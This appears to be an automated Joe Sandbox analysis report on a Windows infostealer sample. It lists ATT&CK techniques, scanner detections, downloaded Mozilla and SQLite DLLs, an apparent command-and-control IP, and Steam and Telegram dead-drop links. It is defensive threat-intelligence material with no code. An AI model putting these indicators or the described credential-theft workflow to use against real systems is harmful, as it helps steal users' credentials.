Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	151 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	411 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	54 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	21%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\KFBFCAFCBKFI\freebl3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\mozglue.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\nss3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\softokn3.dll	0%	ReversingLabs
C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://mozilla.org0/	0%	URL Reputation	safe
https://95.217.246.168/msvcp140.dlly	0%	Avira URL Cloud	safe
https://95.217.246.168/Y	0%	Avira URL Cloud	safe
https://95.217.246.168/vcruntime140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/	0%	Avira URL Cloud	safe
https://95.217.246.168	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dll1	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/msvcp140.dllC	0%	Avira URL Cloud	safe
https://95.217.246.168/vcruntime140.dllv	0%	Avira URL Cloud	safe
https://95.217.246.168/nss3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168IEG	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dllS	0%	Avira URL Cloud	safe
https://95.217.246.168/softokn3.dllk	0%	Avira URL Cloud	safe
https://95.217.246.168/softokn3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/mozglue.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/freebl3.dll	0%	Avira URL Cloud	safe
https://95.217.246.168/sqln.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	96.17.209.196	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://95.217.246.168/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199677575543	false		high
https://95.217.246.168/nss3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/msvcp140.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/softokn3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/freebl3.dll	false	Avira URL Cloud: safe	unknown
https://95.217.246.168/sqln.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	HDBGHDHC.1.dr	false		high
https://duckduckgo.com/ac/?q=	HDBGHDHC.1.dr	false		high
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/badges	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168	76561199677575543[1].htm.1.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/inventory/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168/Y	RegAsm.exe, 00000001.00000002.2794775836.0000000001674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168/msvcp140.dlly	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr, mozglue[1].dll.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://mozilla.org0/	nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HDBGHDHC.1.dr	false		high
https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0	file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp, HIDHIEGI.1.dr	false		high
https://www.ecosia.org/newtab/	HDBGHDHC.1.dr	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168/mozglue.dll1	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168/msvcp140.dllC	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	HIDHIEGI.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/about/	76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168/vcruntime140.dllv	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/snsb82At	file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	HDBGHDHC.1.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp, HIDHIEGI.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://95.217.246.168IEG	RegAsm.exe, 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/profiles/76561199677575543I~	RegAsm.exe, 00000001.00000002.2794775836.000000000159D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	HIDHIEGI.1.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	HDBGHDHC.1.dr	false		high
https://95.217.246.168/freebl3.dllS	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://t.me/snsb82	file.exe, file.exe, 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2796179950.00000000164F6000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	false		high
https://95.217.246.168/softokn3.dllk	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199677575543[1].htm.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	HDBGHDHC.1.dr	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://store.steampowered.com/	76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	RegAsm.exe, 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	HDBGHDHC.1.dr	false		high
https://steamcommunity.com/kI	RegAsm.exe, 00000001.00000002.2794775836.000000000159D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://store.steampowered.com/mobile	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high
https://steamcommunity.com/	76561199677575543[1].htm.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HDBGHDHC.1.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI	RegAsm.exe, 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2794775836.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.217.246.168	unknown	Germany		24940	HETZNER-ASDE	false
96.17.209.196	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431181
Start date and time:	2024-04-24 16:47:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/26@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 76 Number of non-executed functions: 188
